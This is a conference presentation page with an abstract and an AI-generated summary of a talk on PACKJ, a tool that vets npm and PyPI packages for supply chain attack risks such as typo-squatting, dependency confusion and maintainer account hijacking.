PACKJ
Presentation Material
Abstract
From a benign left-pad beginning to recent protestware, software supply chain attacks on open-source package managers such as NPM and PyPI have grown manifold. Bad actors today leverage highly sophisticated techniques such as typo-squatting, repo-jacking, and social engineering to “supply” malicious code. Yet, there is no robust way to analyze packages and measure risks. Metrics such as Github stars/forks are attacker-controlled and can be faked.
In this presentation, we will present a data-driven security analysis framework, called PACKJ, to measure, and control the level of potential supply chain risks when adopting open-source packages. The framework relies on empirically identified (and validated) “risky” code and metadata attributes that makes a package vulnerable to supply chain attacks. Examples include the use of filesystem/network APIs, lack of two-factor authentication, and metadata impersonation. PACKJ employs static code analysis, dynamic tracing, and metadata checks for detecting the presence (or absence) of such risky attributes.
Using our security framework, we have built a large-scale automated system for continuous vetting of packages, and have already identified several abandoned and malicious packages. In this presentation, we will discuss our tool, highlight our findings as well as different types of attacks, and demo our tool to detect “risky” packages and mitigate supply chain attacks.
AI Generated Summary
The talk addresses the critical security risks in software supply chains stemming from widely used package managers (npm, PyPI, RubyGems). It highlights the massive scale of open-source consumption, where modern applications incorporate hundreds of transitive dependencies, creating a vast attack surface. Unlike accidental vulnerabilities (CVEs), supply chain attacks involve intentional malware injection, with techniques including typo squatting (malicious packages with misspelled names), dependency confusion (exploiting CI/CD preferences for higher public versions), account hijacking via expired emails, and sabotage by rogue maintainers.
Existing security tools primarily flag known CVEs but fail to detect novel malicious intent. To counter this, the presentation introduces “package,” a developer-focused vetting tool employing a zero-trust model. It combines metadata analysis (validating maintainer emails, detecting abandoned packages, verifying GitHub repository provenance, and identifying star-jacking) with static analysis (monitoring sensitive API calls like file access, network exfiltration, and code execution) and runtime analysis (comparing behavioral traces across versions to spot anomalies). The tool is customizable to organizational risk thresholds, reducing alert fatigue.
Practical implications emphasize that enterprises must proactively vet dependencies rather than relying on package manager trust. “Package” automates this by flagging risks such as expired maintainer emails (enabling hijacking), sudden updates to old packages, and suspicious code behaviors. Case studies, including the CTX package hijack and the colors.js sabotage, demonstrate how the tool’s multi-layered analysis would have identified these threats. The core takeaway is that securing the supply chain requires continuous, automated scrutiny of package integrity and behavior beyond conventional vulnerability databases.